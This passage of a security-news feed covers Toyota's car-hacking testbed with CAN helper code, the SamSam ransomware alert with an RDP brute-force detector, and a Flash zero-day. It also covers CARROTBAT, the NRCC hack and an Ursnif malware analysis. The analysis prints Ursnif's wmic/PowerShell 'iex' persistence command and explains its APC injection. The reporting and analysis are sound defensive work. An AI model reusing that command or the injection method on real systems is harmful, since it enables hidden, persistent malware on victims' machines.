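    raw_id = (can_id | CAN_EFF_FLAG) if extended else can_id
    return struct.pack(FRAME_FMT, raw_id, len(data), data.ljust(8, b"\0"))


def parse_frame(buf):
    """Unpack a can_frame into its id, the extended flag and the live data bytes."""
    raw_id, dlc, data = struct.unpack(FRAME_FMT, buf)
    extended = bool(raw_id & CAN_EFF_FLAG)
    can_id = raw_id & (CAN_EFF_MASK if extended else CAN_SFF_MASK)
    return {"id": can_id, "extended": extended, "data": data[: min(dlc, 8)]}


def obd_request(pid, mode=0x01):
    """Mode 01 'show current data' request: [length, mode, pid], padded to 8 bytes."""
    return build_frame(OBD_REQUEST_ID, bytes([0x02, mode, pid]))


def obd_rpm_from_response(buf):
    """Decode an engine-RPM reply [len, 0x41, 0x0C, A, B]; RPM = (256*A + B) / 4."""
    frame = parse_frame(buf)
    d = frame["data"]
    if frame["id"] != OBD_RESPONSE_ID or len(d) < 5 or d[1] != 0x41 or d[2] != PID_ENGINE_RPM:
        return None
    return (256 * d[3] + d[4]) / 4


if __name__ == "__main__":
    req = obd_request(PID_ENGINE_RPM)
    print("request :", req.hex())
    reply = build_frame(OBD_RESPONSE_ID, bytes([0x04, 0x41, 0x0C, 0x1A, 0xF8]))
    print("rpm     :", obd_rpm_from_response(reply))
```

The same 16-byte buffers are what a Linux host writes to and reads from a SocketCAN interface, so the helpers carry over unchanged from a simulator to a real OBD-II adapter; the point of a testbed is that the injected frame reaches isolated ECUs rather than a car on the road.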

“You can modify the programming of ECUs in C” as well, he said.

Among future improvements for PASTA there is the implementation of other connectivity features, including Ethernet, LIN, and CAN FD, Wi-Fi and of course Bluetooth.

You can download slides and the research paper from the following link:

• Download Presentation Slides
• Download White Paper

Pierluigi Paganini

(Security Affairs – car hacking, PASTA)

The post Toyota presented PASTA (Portable Automotive Security Testbed) Car-Hacking Tool appeared first on Security Affairs.

Ukraine’s SBU: Russia carried out a cyberattack on Judiciary Systems

Ukraine is accusing Russian intelligence services of carrying out cyberattacks against one of its government organizations.

Ukraine’s security service SBU announced to have blocked a cyber attack launched by Russian intelligence aimed at breaching information and telecommunications systems used by the country’s judiciary.

Attackers launched a spear phishing campaign using messages purporting to deliver accounting documents. The weaponized document carried a strain of malware developed to exfiltrate data from, and disrupt, the judiciary’s systems.

Ukrainian government experts were able to identify the command and control (C&C) infrastructure, which uses Russian IP addresses.

The attack was detected and neutralized thanks to collaboration between the State Service on Intellectual Property (SSIP) and the State Judicial Administration.

“Employees of the Security Service of Ukraine blocked the attempt of Russian special services to conduct a large-scale cyberattack on the information and telecommunication systems of the judiciary of Ukraine. Specialists of the SBU noted that the cyberattack began due to the sending by e-mail of counterfeit accounting documents infected by the virus.” reads the alert published by the SBU.

“After opening files on computers, malicious software for unauthorized interference with judicial information systems and theft of official information were hidden. Employees of the Security Service of Ukraine found that the detected virus program was connected from control-command servers that have, in particular, Russian IP addresses.”

In July, Ukraine’s SBU Security Service reportedly stopped a VPNFilter attack on a chlorine distillation station; the malware had infected network equipment at the facility, which supplies water treatment and sewage plants.

VPNFilter is a multi-stage, modular strain of malware with a wide range of capabilities for both cyber espionage and sabotage, and it has been attributed to Russia.

Technical analysis of the code revealed many similarities with another nation-state malware, BlackEnergy, which was specifically designed to target ICS/SCADA systems and has been attributed to Russian threat actors. BlackEnergy is considered the key element in the attacks on the Ukrainian power grid in 2015 and 2016, and it was also involved in attacks against mining and railway systems in the country.

This week, Adobe released security updates for Flash Player that address two vulnerabilities, including a zero-day flaw, tracked as CVE-2018-15982, exploited in targeted attacks.

Experts observed the exploitation of the Flash zero-day exploit in an attack aimed at the FSBI “Polyclinic No. 2” of the Administrative Directorate of the President of the Russian Federation.

Once opened, the decoy document shows a questionnaire for personnel of the Moscow-based hospital, while the zero-day exploit is executed in the background.

Gigamon has also published a blog post describing the flaw and the attack; the experts pointed out that the Russian-language decoy document was submitted to VirusTotal from a Ukrainian IP address. Qihoo 360 researchers observed that the attack was launched just days after the Kerch Strait incident of November 25, when Russian Federal Security Service (FSB) border service coast guard boats fired upon and captured three Ukrainian Navy vessels that had attempted to pass from the Black Sea into the Sea of Azov through the Kerch Strait on their way to the port of Mariupol.

Some of the injured crew members were taken to hospitals in Moscow and one of these hospitals could be the Polyclinic No. 2. Malicious documents involved in this attack were uploaded to VirusTotal from a Ukrainian IP address, which could indicate that Ukrainian cyberspies targeted the hospital to obtain information on the state of the crew members.

Pierluigi Paganini

(Security Affairs – Ukraine, Russia)

The post Ukraine’s SBU: Russia carried out a cyberattack on Judiciary Systems appeared first on Security Affairs.

DHS and FBI published a joint alert on SamSam Ransomware

The US Department of Homeland Security (DHS) and the FBI issued a joint alert on SamSam attacks targeting critical infrastructure.

The US Department of Homeland Security (DHS) and the FBI published a joint alert on the activity associated with the infamous SamSam ransomware.

The SamSam hackers extorted over 200 organizations, including public institutions, municipalities, and hospitals, causing over $30 million in losses.

In March 2018, computer systems in the City of Atlanta were infected by the ransomware; the cyber attack was confirmed by city officials.

The ransomware infection caused the interruption of several of the city's online services, including “various internal and customer-facing applications” used to pay bills or access court-related information.

One of the latest attacks hit the Port of San Diego in September; the incident impacted the processing of park permits and record requests, along with other operations.

In February, SamSam ransomware infected over 2,000 computers at the Colorado Department of Transportation (DOT), which shut down the infected workstations.

In August, the security firm Sophos published a report on the SamSam ransomware; its experts tracked Bitcoin addresses managed by the crime gang and discovered that the crooks had extorted nearly $6 million from victims since December 2015, when the malware first appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015. 74% of the known victims are based in the United States. Other regions known to have suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid an overall amount of $5.9 million; the security firm also estimated that the group is netting around $300,000 per month.

A few days ago, the U.S. DoJ charged two Iranian men, Faramarz Shahi Savandi (34) and Mohammad Mehdi Shah Mansouri (27), over their alleged role in creating and spreading the infamous SamSam ransomware.

According to the joint report, most of the victims were located in the United States.

“The SamSam actors targeted multiple industries, including some within critical infrastructure. Victims were located predominately in the United States, but also internationally.” reads the alert.

“Network-wide infections against organizations are far more likely to garner large ransom payments than infections of individual systems. Organizations that provide essential functions have a critical need to resume operations quickly and are more likely to pay larger ransoms.”

SamSam actors leverage vulnerabilities in Windows servers to gain persistent access to the target network and make lateral movements to infect other hosts on the network.

According to the report, attackers used the JexBoss Exploit Kit to compromise JBoss applications. Threat actors also use Remote Desktop Protocol (RDP) to gain persistent access to victims’ networks, relying on brute force attacks and stolen login credentials.

After obtaining access to the victim’s network, attackers escalate privileges, then drop and execute the malware.

“After gaining access to a particular network, the SamSam actors escalate privileges for administrator rights, drop malware onto the server, and run an executable file, all without victims’ action or authorization. While many ransomware campaigns rely on a victim completing an action, such as opening an email or visiting a compromised website, RDP allows cyber actors to infect victims with minimal detection.” continues the alert.

According to the experts, attackers used stolen RDP credentials bought from darknet marketplaces, and used them in attacks within hours of purchase.

The alert also includes technical details and the following recommendations to mitigate the threat:

  • Audit your network for systems that use RDP for remote communication. Disable the service if unneeded or install available patches. Users may need to work with their technology vendors to confirm that patches will not affect system processes.
  • Verify that all cloud-based virtual machine instances with public IPs have no open RDP ports, especially port 3389, unless there is a valid business reason to keep open RDP ports. Place any system with an open RDP port behind a firewall and require users to use a virtual private network (VPN) to access that system.
  • Enable strong passwords and account lockout policies to defend against brute force attacks.
  • Where possible, apply two-factor authentication.
  • Regularly apply system and software updates.
  • Maintain a good back-up strategy.
  • Enable logging and ensure that logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.
  • When creating cloud-based virtual machines, adhere to the cloud provider’s best practices for remote access.
  • Ensure that third parties that require RDP access follow internal policies on remote access.
  • Minimize network exposure for all control system devices. Where possible, disable RDP on critical devices.
  • Regulate and limit external-to-internal RDP connections. When external access to internal resources is required, use secure methods such as VPNs. Of course, VPNs are only as secure as the connected devices.
  • Restrict users’ ability (permissions) to install and run unwanted software applications.
  • Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
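Several of these recommendations (capture RDP logins, review the logs for intrusion attempts, keep RDP off public addresses) can be checked against Windows Security event telemetry. The following Python is an added example, not part of the DHS/FBI alert: it runs over constructed event records and assumes the standard 4624/4625 event IDs with LogonType 10 for RDP sessions; the internal address allow-list and the thresholds are assumptions of the example.

```python
"""Review RDP logon telemetry for brute force and suspicious successes.

Added example, not part of the DHS/FBI alert. It consumes constructed
records shaped like Windows Security events (4625 = failed logon,
4624 = successful logon, LogonType 10 = RemoteInteractive, i.e. RDP)
and emits the alerts a reviewer of the RDP logs would want to see.
"""
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (not real data):
# "<timestamp> <EventID> <LogonType> <account> <source IP>"
SAMPLE_EVENTS = [
    "2018-12-01T02:00:01 4625 10 administrator 203.0.113.7",
    "2018-12-01T02:00:03 4625 10 admin 203.0.113.7",
    "2018-12-01T02:00:05 4625 10 backup 203.0.113.7",
    "2018-12-01T02:00:08 4625 10 svc_sql 203.0.113.7",
    "2018-12-01T02:00:11 4625 10 helpdesk 203.0.113.7",
    "2018-12-01T02:00:15 4624 10 helpdesk 203.0.113.7",  # guess succeeded
    "2018-12-01T09:15:00 4624 10 jsmith 10.20.30.40",    # routine internal RDP
    "2018-12-01T09:16:00 4625 2 jsmith 10.20.30.40",     # console logon, not RDP
    "2018-12-01T14:00:00 4625 10 jdoe 10.20.30.41",      # one typo ...
    "2018-12-01T14:00:30 4624 10 jdoe 10.20.30.41",      # ... then success: benign
]

# Address space RDP sessions are expected to come from (an assumption of this
# example; a real deployment would use its own allow-list or VPN pool).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

RDP_LOGON_TYPE = 10
FAILED_LOGON, SUCCESSFUL_LOGON = 4625, 4624


def parse_event(line):
    """Turn one whitespace-separated record into a dict with typed fields."""
    ts, event_id, logon_type, account, src_ip = line.split()
    return {
        "ts": datetime.fromisoformat(ts),
        "event_id": int(event_id),
        "logon_type": int(logon_type),
        "account": account,
        "src_ip": ipaddress.ip_address(src_ip),
    }


def is_internal(ip):
    """True when the source address is inside the expected internal ranges."""
    return any(ip in net for net in INTERNAL_NETS)


def detect_rdp_abuse(lines, threshold=5, window=timedelta(minutes=10),
                     min_failures_before_success=3):
    """Return a list of (alert_type, source_ip, detail) tuples.

    BRUTE_FORCE: at least `threshold` failed RDP logons from one IP in `window`.
    SUCCESS_AFTER_FAILURES: an RDP success from an IP with at least
        `min_failures_before_success` recent failures (a guess or a bought
        credential that finally worked); a single typo is not flagged.
    EXTERNAL_RDP_LOGON: an RDP success from outside INTERNAL_NETS, which the
        alert says should not exist without a VPN in front of the host.
    """
    events = sorted((parse_event(l) for l in lines), key=lambda e: e["ts"])
    recent_failures = defaultdict(list)   # src_ip -> failure timestamps
    brute_forced = set()
    alerts = []
    for ev in events:
        if ev["logon_type"] != RDP_LOGON_TYPE:
            continue                      # only RDP sessions matter here
        ip = ev["src_ip"]
        fails = recent_failures[ip]
        while fails and ev["ts"] - fails[0] > window:
            fails.pop(0)                  # slide the window forward
        if ev["event_id"] == FAILED_LOGON:
            fails.append(ev["ts"])
            if len(fails) >= threshold and ip not in brute_forced:
                brute_forced.add(ip)
                alerts.append(("BRUTE_FORCE", str(ip), len(fails)))
        elif ev["event_id"] == SUCCESSFUL_LOGON:
            if len(fails) >= min_failures_before_success:
                alerts.append(("SUCCESS_AFTER_FAILURES", str(ip), ev["account"]))
            if not is_internal(ip):
                alerts.append(("EXTERNAL_RDP_LOGON", str(ip), ev["account"]))
    return alerts


def run_sample():
    """Run the detector over the constructed events."""
    return detect_rdp_abuse(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in run_sample():
        print(*alert)
```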

Pierluigi Paganini

(Security Affairs – SamSam ransomware, hacking)

The post DHS and FBI published a joint alert on SamSam Ransomware appeared first on Security Affairs.

CVE-2018-15982 Adobe zero-day exploited in targeted attacks

Adobe released security updates for Flash Player that address two vulnerabilities, including a critical flaw, tracked as CVE-2018-15982, exploited in targeted attacks.

Adobe fixed two flaws including a critical use-after-free bug, tracked as CVE-2018-15982, exploited by an advanced persistent threat actor aimed at a healthcare organization associated with the Russian presidential administration.

The flaw could be exploited by attackers to execute arbitrary code; Adobe addressed it with the release of Flash Player 32.0.0.101 for Windows, macOS, Linux, and Chrome OS.

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address one critical vulnerability in Adobe Flash Player and one important vulnerability in Adobe Flash Player installer.” reads the security advisory published by Adobe.

“Successful exploitation could lead to Arbitrary Code Execution and privilege escalation in the context of the current user respectively. 

Adobe is aware of reports that an exploit for CVE-2018-15982 exists in the wild.”

Adobe confirmed that it is aware of attacks exploiting the flaw in the wild.

Adobe has credited the following experts for reporting the CVE-2018-15982 flaw:

  • Chenming Xu and Ed Miles of Gigamon ATR
  • Yang Kang (@dnpushmen) and Jinquan (@jq0904) of Qihoo 360 Core Security (@360CoreSec)
  • He Zhiqiu, Qu Yifan, Bai Haowen, Zeng Haitao and Gu Liang of 360 Threat Intelligence of 360 Enterprise Security Group
  • independent researcher b2ahex

Attackers used decoy Word documents embedding a Flash file that exploits the zero-day vulnerability. The Word document is delivered in a RAR archive together with a JPG picture. When the Flash vulnerability is triggered, the malware extracts the RAT code embedded in the JPG picture.

“The attack strategy is very clever: Flash file with 0day vulnerability is inserted into decoy Word document which is compressed into one RAR file with a JPG picture. When Flash 0day vulnerability is triggered, it will extract out RAT from that JPG picture. Such trick aims to avoid detection of most security software. This RAT has same digital signature as one RAT which is very likely written by Hacking Team, latter was found August 2018. We believe that the new RAT is an upgrade version of Hacking Team’s RAT.” reads the analysis published by the 360 Enterprise Security Group.

“This vulnerability and exploitation code could be reused by cybercriminals even other APT groups for large-scale attacks, we would suggest users to take necessary protection, like applying latest Adobe Flash patch.”

“The vulnerability (CVE-2018-15982) allows for a maliciously crafted Flash object to execute code on a victim’s computer, which enables an attacker to gain command line access to the system.” reads the post published by Gigamon.

“The document was submitted to VirusTotal from a Ukrainian IP address and contains a purported employment application for a Russian state healthcare clinic.”

Experts observed the exploitation of the Flash zero-day exploit in an attack aimed at the FSBI “Polyclinic No. 2” of the Administrative Directorate of the President of the Russian Federation.

Once opened, the decoy document shows a questionnaire for personnel of the Moscow-based hospital, while the zero-day exploit is executed in the background.

The post CVE-2018-15982 Adobe zero-day exploited in targeted attacks appeared first on Security Affairs.

Fractured Block Campaign: CARROTBAT dropper supports a dozen decoy document formats

Palo Alto Networks recently discovered a malware dropper, dubbed CARROTBAT, that supports a dozen decoy document file formats to drop many payloads.

Experts from Palo Alto Networks have recently discovered a malware dropper, dubbed CARROTBAT, that supports a dozen decoy document file formats to drop many payloads.

Although CARROTBAT was first discovered in March 2018, in the past three months experts have observed an intensification of the activity associated with the dropper.

CARROTBAT was spotted while threat actors were using it to drop payloads in the South and North Korea region; the attackers used subjects such as cryptocurrencies, cryptocurrency exchanges, and political events for the decoy documents.

“Unit 42 has uncovered a campaign leveraging a previously unreported customized dropper that is being used to deliver lures primarily pertaining to the South Korea and North Korea region. These lures revolve around a series of subjects, including various cryptocurrencies, cryptocurrency exchanges, and political events.” reads the analysis published by Palo Alto Networks.

CARROTBAT was used in an attack against a British government agency in December; at the time, threat actors used the decoy documents to drop the SYSCON backdoor.

Palo Alto Networks has detected 29 unique CARROTBAT samples since its discovery; they contained a total of 12 unique decoy documents.

Palo Alto Networks tracked the CARROTBAT attacks as Fractured Block; the attackers used 11 decoy document file formats (.doc, .docx, .eml, .hwp, .jpg, .pdf, .png, .ppt, .pptx, .xls, and .xlsx).

In March, attackers were using the dropper to deliver different payloads, including old versions of the SYSCON RAT and a new sample of the OceanSalt malware.

Experts pointed out that CARROTBAT is not sophisticated and implements only rudimentary command obfuscation.

Once the embedded decoy document is opened, an obfuscated command is executed on the system to download and execute a remote file via the Microsoft Windows built-in certutil utility.

The analysis of timestamps associated with CARROTBAT samples revealed they have been compiled between March 2018 and September 2018.

Between March and July, experts observed attackers using the dropper to deliver multiple instances of SYSCON. Since June, OceanSalt attackers have started using it too.

Experts discovered an infrastructure overlap between the CARROTBAT and KONNI malware families.

Cisco Talos team discovered the KONNI malware in May when it was used in targeted attacks aimed at organizations linked to North Korea.

The malware, dubbed “KONNI” by researchers, went undetected for more than 3 years and was used in highly targeted attacks. It was able to avoid detection thanks to continuous evolution; recent versions are capable of executing arbitrary code on the target systems and stealing data.

In August, experts at Cylance noticed that the decoy document used in KONNI attacks is similar to the one used in recent campaigns of the DarkHotel APT.

“Finding CARROTBAT provided an important lynchpin in identifying Fractured Block Campaign activity. Using CARROTBAT, we were able to find related OceanSalt, SYSCON and KONNI activity.”  Palo Alto Networks concludes. 

“The various overlaps encountered are notable, and it is our suspicion that this threat activity may all belong to the same threat actor. However, we do not believe there to be enough evidence at this time to make this claim with complete certainty.”

Pierluigi Paganini

(Security Affairs – Sofacy, Brexit)

The post Fractured Block Campaign: CARROTBAT dropper supports a dozen decoy document formats appeared first on Security Affairs.

Email accounts of top NRCC officials were hacked in 2018

Threat actors had access to the email accounts of at least four NRCC aides and spied on thousands of sent and received emails for several months.

The email system at the National Republican Congressional Committee (NRCC), the Republican Party’s campaigning arm, was hacked.

The news was first reported by Politico; the committee later admitted the intrusion and confirmed that attackers had access to mail messages for months.

“The House GOP campaign arm suffered a major hack during the 2018 midterm campaigns, exposing thousands of sensitive emails to an outside intruder, according to three senior party officials.” states the report published by Politico.

“The email accounts of four senior aides at the National Republican Congressional Committee were surveilled for several months, the party officials said. The intrusion was detected in April by an NRCC vendor, who alerted the committee and its cybersecurity contractor. An internal investigation was initiated, and the FBI was alerted to the attack, said the officials, who requested anonymity to discuss the incident.”

An NRCC vendor alerted the committee and its cybersecurity contractor in April. The National Republican Congressional Committee alerted the authorities and launched an internal investigation.

Politico reported that senior House Republicans, including Speaker Paul Ryan of Wisconsin, Majority Leader Kevin McCarthy of California and Majority Whip Steve Scalise of Louisiana, were not informed of the intrusion until the media outlet reported it to the NRCC earlier this week.

It is a difficult moment for the Republican Party that lost 40 seats and gave up majority control to the Democrats in the House after the 2018 mid-term election.

At the time, the attack was not attributed to a specific threat actor, but it is clear that the hackers carried out a cyber espionage campaign.

The attack presents many similarities with the DNC hack that occurred before the 2016 election, which US intelligence attributed to Russia-linked APT groups.

It’s not clear what measures the NRCC had adopted to prevent this kind of intrusion; after being notified of the intrusion, the committee alerted the security firm CrowdStrike.

“Like other major committees, the NRCC also had security procedures in place before the election cycle began to try to limit the amount of information that could be exposed to a potential hacker. It also employed a full-time cybersecurity employee.” concludes Politico.

Pierluigi Paganini

(Security Affairs – National Republican Congressional Committee (NRCC), hacking)

The post Email accounts of top NRCC officials were hacked in 2018 appeared first on Security Affairs.

Healthcare Cybersecurity

The healthcare industry is one of the biggest targets for hackers and other bad actors, given the massive amount of personal data these organizations have in their possession and the

The post Healthcare Cybersecurity appeared first on The Cyber Security Place.

Security Affairs: M2M protocols can be abused to attack IoT and IIoT systems

Security experts from Trend Micro discovered that some machine-to-machine (M2M) protocols can be abused to attack IoT and industrial Internet of Things (IIoT) systems.

According to a study conducted by experts from Trend Micro and the Polytechnic University of Milan, attackers abuse M2M protocols to target IoT and IIoT devices.

The experts analyzed the M2M protocols, the Message Queuing Telemetry Transport (MQTT) and Constrained Application Protocol (CoAP).

The former is a messaging protocol used to establish communication between a broker and multiple clients; the latter is a UDP client-server protocol that allows communication between nodes.

M2M protocols flaws

The experts pointed out that attackers could abuse M2M protocols for target reconnaissance, industrial espionage, targeted attacks, and to make lateral movements.

Researchers monitored both protocols over a period of four months, taking the attacker’s role for their research.

“For data gathering, we played the role of a casual attacker with modest resources, scanning the internet for exposed MQTT brokers and CoAP hosts. In just nearly four months, such a “casual attacker” was able to collect 209,944,707 MQTT messages obtained from 78,549 brokers and 19,208,047 CoAP responses from 441,964 servers.” reads the research paper.

The analysis of the MQTT protocol revealed the existence of security flaws that could be exploited to trigger a DoS condition or execute arbitrary code. Trend Micro reported the vulnerabilities to the developers of the affected software, who quickly released patches.

Below a video PoC of the attacks abusing the MQTT protocols:

The researchers did not find security flaws in the CoAP protocol, but warned that it is susceptible to IP spoofing, which attackers could exploit for DDoS amplification attacks.

“However, the Request for Comments (RFC) defining the protocol, RFC 7252, explicitly pinpoints the security issues (mainly due to the “connectionless” nature of UDP), which we confirmed with a practical experiment.” continues the report.

“On a test network with CoAP clients and servers, we launched an amplification attack with increasing payload size and estimated the maximum bandwidth amplification factor (BAF). According to our estimate, CoAP can reach up to 32 times (32x) amplification factor, which is roughly between the amplification power of DNS and SSDP.”

Experts highlighted the risk that malware could abuse M2M protocols for malicious activity in the near future.

“MQTT and CoAP are data protocols playing a fundamental role in M2M communication among consumer and industrial applications. The presence of unsecure MQTT and CoAP deployments shows no improved security awareness since 2017, when this problem was first highlighted for MQTT.” concludes the report.

“Despite the security recommendations being well highlighted in the CoAP RFC, CoAP already suffers from a deployment problem similar to that affecting MQTT. Both MQTT and CoAP have some features that, even in the absence of implementation vulnerabilities, can be abused to the attacker’s advantage. When deploying or using MQTT and CoAP services, the following practical points should be considered.”

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)

The post M2M protocols can be abused to attack IoT and IIoT systems appeared first on Security Affairs.


Dissecting the latest Ursnif DHL-Themed Campaign

Security experts at Yoroi – Cybaze Z-Lab discovered a new variant of the infamous Ursnif malware targeting Italian users through a malspam campaign.

Introduction

In the last weeks, a new variant of the infamous Ursnif malware was discovered hitting Italian users through a malspam campaign. In fact, Yoroi-Cybaze ZLAB isolated several malicious emails having the following content:

  • Subject: “VS Spedizione DHL AWB 94856978972 proveniente dalla GRAN BRETAGNA AVVISO DI GIACENZA”
  • Attachment: “GR930495-30495.zip”

The content of the attachment is a .js file which, when launched, starts the infection by downloading other components from the Internet.

The Dropper

The initial dropper is an obfuscated JavaScript. Once run, it generates a lot of noisy internet traffic in order to hinder the detection of the real malicious infrastructure; as we can see from the following figures, the script contains a series of random-looking URLs it unsuccessfully tries to connect to, generating a huge volume of noise in the analysis environment.

Figure 1: Hard coded urls where the malware tries to connect to generate noise

Figure 2: Generated internet traffic noise

However, the real malicious action performed by the JavaScript is the creation of a batch file at the “%APPDATA%\Roaming\325623802.bat” path. The file is a simple script containing the following code:

Figure 3: Extracted batch file

The script execution pops up on screen a harmless “FedEx” brochure in PDF format used as a decoy for the victim; in the meanwhile, it downloads and extracts a PE32 executable file from a CAB archive hosted on a compromised Chinese website.

Figure 4: PDF downloaded from the internet and shown to the user

The second stage

The second stage of the infection chain is the “ppc.cab” file downloaded by the dropper to the “%APPDATA%\Roaming” location: it is actually a Microsoft Cabinet archive embedding an executable file named “puk.exe”.
The “puk.exe” file promptly spawns a new copy of its own process to make debugging harder, then it starts several instances of the Internet Explorer process to hide its network activity inside legitimate processes.

Figure 5: processes spawned by the original “puk.exe”

The network traffic generated by the iexplore.exe processes points to the remote destinations 149.129.129.1 (ALICLOUD-IN) and 47.74.131.146 (AL-3), part of the attacker’s malicious infrastructure.

Figure 6: C2 network traffic

The beaconing pattern recognized in the C2 communication is consistent with Gozi/Ursnif/IFSB/Dreambot malware variants. In addition, the particular “/wpapi/” base URL adopted by the sample matches several malspam campaigns tracked during the current year (rif EW. N070618N030618N010318).

Figure 7: Malware’s beaconing requests

Persistency

The third stage of the malware is designed to ensure its long-term persistence on the infected system. It sets up a particular registry key containing chunks of binary data: “HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\6C174C70-DB2B-7E6F-C560-3F92C994E3E6”

Figure 9: Registry key written by the malware

Among the registry entries shown above, there is one named “ddraxpps”: this particular name was also used in the persistence mechanism of other Ursnif samples analyzed back in January. Also, the malware configures a key named “comuroxy” containing a wmic “process call create” command designed to invoke the PowerShell code stored in the “ddraxpps” entry: C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\6C174C70-DB2B-7E6F-C560-3F92C994E3E6').ddraxpps))".

The “ddraxpps” registry key stores a hex string that can be decoded with a simple hex-to-ASCII conversion; its content is actually the following obfuscated PowerShell code:

Figure 10: body of “ddraxpps” key

The first line of code shows a set of commands allowing the execution of some kind of payload encoded in decimal format. The array of numbers at line two represents the actual executable payload in decimal notation.

  1. $sagsfg="qmd";function ndltwntg{$sxpjuhsps=[System.Convert]::FromBase64String($args[0]);[System.Text.Encoding]::ASCII.GetString($sxpjuhsps);};

The third line, instead, contains a base64-encoded PowerShell snippet revealing the usage of a known payload injection technique, the “APC injection” or “AtomBombing”, used to infect the “iexplore.exe” process.

Figure 11: Commands of the third row of “ddraxpps” key

All the commands shown in Figure 11 are necessary to perform the APC injection: the first variable, “$jtwhasq”, imports the necessary library “kernel32.dll”, in particular the functions “GetCurrentProcess()” and “VirtualAllocEx()”. The second row imports the functions “GetCurrentThreadId()”, “QueueUserAPC()” and “OpenThread()”. The third row contains the real injection: while the first two lines prepare all the imports, functions and related parameters, the third one is responsible for executing the actual APC injection technique. The first step is to create a virtual section using the “VirtualAllocEx()” function in the current process, identified thanks to “GetCurrentProcess()”. The malware is then copied into the virtual section and, finally, this section is injected into a local thread within the “iexplore.exe” process thanks to the “QueueUserAPC()” function.
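The decoding steps described above (hex-to-ASCII first, then a decimal byte array on the second line and a base64 blob on the third) can be reproduced as a triage helper. The following Python is an added example, not code from the Yoroi analysis or from the malware: it builds a benign, constructed value in the same three-line layout, peels the layers, and reports which of the injection-related API names listed above appear in the decoded text.

```python
"""Peel the encoding layers of an Ursnif-style "ddraxpps" registry value.

Added analysis helper (not from the Yoroi write-up). The registry data is
described as a hex string that decodes to three PowerShell lines: a base64
decoding helper, a decimal-encoded payload array, and a base64 blob. The
value decoded here is constructed and benign; it only mimics that layout.
"""
import base64
import re

# API names the analysis lists as the building blocks of the APC injection.
INJECTION_APIS = ("kernel32.dll", "GetCurrentProcess", "VirtualAllocEx",
                  "GetCurrentThreadId", "QueueUserAPC", "OpenThread")

# Eight or more comma-separated 1-3 digit numbers: the decimal payload array.
DECIMAL_ARRAY_RE = re.compile(r"(?<![\w.])(\d{1,3}(?:,\d{1,3}){7,})(?![\w.])")
# A quoted base64 token long enough not to be an ordinary string literal.
BASE64_RE = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')


def build_constructed_value():
    """Return a hex string in the three-line layout (constructed, not malware)."""
    payload = b"CONSTRUCTED-STAGE-TWO"          # stands in for the real payload
    decimals = ",".join(str(b) for b in payload)
    snippet = 'Write-Host "constructed placeholder: QueueUserAPC VirtualAllocEx"'
    b64 = base64.b64encode(snippet.encode("ascii")).decode("ascii")
    lines = [
        # line 1: helper that base64-decodes its argument (same role as on the page)
        '$h="qmd";function dec{$b=[System.Convert]::FromBase64String($args[0]);'
        '[System.Text.Encoding]::ASCII.GetString($b);};',
        # line 2: payload as decimal bytes
        f"[byte[]]$p={decimals};",
        # line 3: base64 blob handed to the helper
        f'iex(dec "{b64}");',
    ]
    return "\n".join(lines).encode("ascii").hex()


def decode_hex_layer(hex_value):
    """Hex-to-ASCII step the analysis applies to the registry value."""
    return bytes.fromhex(hex_value).decode("ascii")


def extract_layers(hex_value):
    """Decode the outer hex layer, then pull out the decimal payload and any
    base64-encoded snippets. Returns a dict for further triage."""
    script = decode_hex_layer(hex_value)
    result = {"lines": script.splitlines(), "payload": None, "snippets": []}
    m = DECIMAL_ARRAY_RE.search(script)
    if m:
        values = [int(v) for v in m.group(1).split(",")]
        if all(0 <= v <= 255 for v in values):       # must all be byte values
            result["payload"] = bytes(values)
    for m in BASE64_RE.finditer(script):
        try:
            result["snippets"].append(
                base64.b64decode(m.group(1), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue                                  # not base64-encoded text
    return result


def injection_indicators(text):
    """Which of the injection-related API names appear in decoded text."""
    return [name for name in INJECTION_APIS if name in text]


if __name__ == "__main__":
    layers = extract_layers(build_constructed_value())
    print(len(layers["lines"]), "lines; payload:", layers["payload"])
    for s in layers["snippets"]:
        print("decoded:", s, "->", injection_indicators(s))
```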

Conclusion

In the end, the whole infection chain can be summarized in four stages: the generation of network noise to hide the attacker’s infrastructure, the download of the executable payload, the achievement of persistence through the installed registry key, and the check for and download of the Ursnif modules.

Figure 12. Representation of the infection chain

Further details, including IoCs and Yara rules, are reported in the original blog post published by Yoroi.

Pierluigi Paganini

(Security Affairs – Ursnif, malware)

The post Dissecting the latest Ursnif DHL-Themed Campaign appeared first on Security Affairs.

Quora hacked: Personal data of 100 million users stolen

By Waqas

Quora hacked – Change your password now. Another day, another data breach – This time Quora, a question-and-answer website, has suffered a massive data breach in which personal data of 100 million registered users has been stolen, the company said on Tuesday, December 4th. In a blog post, Quora’s Chief Executive Adam D’Angelo explained that the […]

This is a post from HackRead.com Read the original post: Quora hacked: Personal data of 100 million users stolen

Security Affairs: 4 Industries That Have to Fight the Hardest Against Cyberattacks

Society’s dependence on internet-based technologies means security professionals must defend against cyberattacks as well as more traditional threats, such as robbers or disgruntled employees.

However, cybercriminals target some industries at disproportionally high rates. Here are four of them:

1. Health Care

Since health care professionals deal with life-or-death situations, cyberattacks could hinder both productivity and patient care to a tremendous degree. Some attacks shut down entire health systems comprising multiple facilities or force affected individuals to switch from computerized processes to pens and paper.

